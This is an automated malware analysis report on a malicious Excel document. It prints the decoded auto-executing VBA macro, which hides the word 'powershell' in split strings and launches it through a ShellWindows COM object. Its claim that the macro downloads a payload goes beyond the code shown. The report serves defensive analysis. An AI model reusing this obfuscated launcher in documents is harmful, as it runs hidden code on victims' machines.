Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 764b351509404abd…

MALICIOUS

Office (OOXML)

13.4 KB Created: 2021-06-08 07:44:17 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: 4e2474e2ef34d800d79503603c10db1f SHA-1: ef4b9efc5a1de556139fb9705f03b4f0af49ffd1 SHA-256: 764b351509404abd9c5a59f5c10a748bf8937e1678fee0320d1c83514d166b74
108 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an OOXML document containing a VBA macro that is automatically executed via the AutoOpen subroutine. This macro constructs and executes a PowerShell command. The script concatenates strings to form the command 'powershell', and uses GetObject to launch it, likely to download and execute a second-stage payload. The presence of AutoOpen and GetObject calls strongly suggests malicious intent.

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        ggwp = gg & wp
        Set obj = GetObject(p4)
        obj.Document.Application.ShellExecute ggwp, Null, , Null, 1
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1043 bytes
SHA-256: eb1cad18f533ad2a2022a3290dd11f7b6948107d720d4afc2988db88367e37f9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoOpen()

    Dim gg As String
    Dim wp As String
    Dim ggwp As String
    Dim p1 As String
    Dim p2 As String
    Dim p3 As String
    Dim p4 As String
    gg = "powers"
    wp = "hell"
    p1 = "new:C08AFD"
    p2 = "90-F2A1-11D1-845"
    p3 = "5-00A0C91F3880"
    p4 = p1 & p2 & p3
    ggwp = gg & wp
    Set obj = GetObject(p4)
    obj.Document.Application.ShellExecute ggwp, Null, , Null, 1
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 14848 bytes
SHA-256: 65e91a375d269b7291b77d72ebfd500bc1df075e9631250248df3fde5f890e2f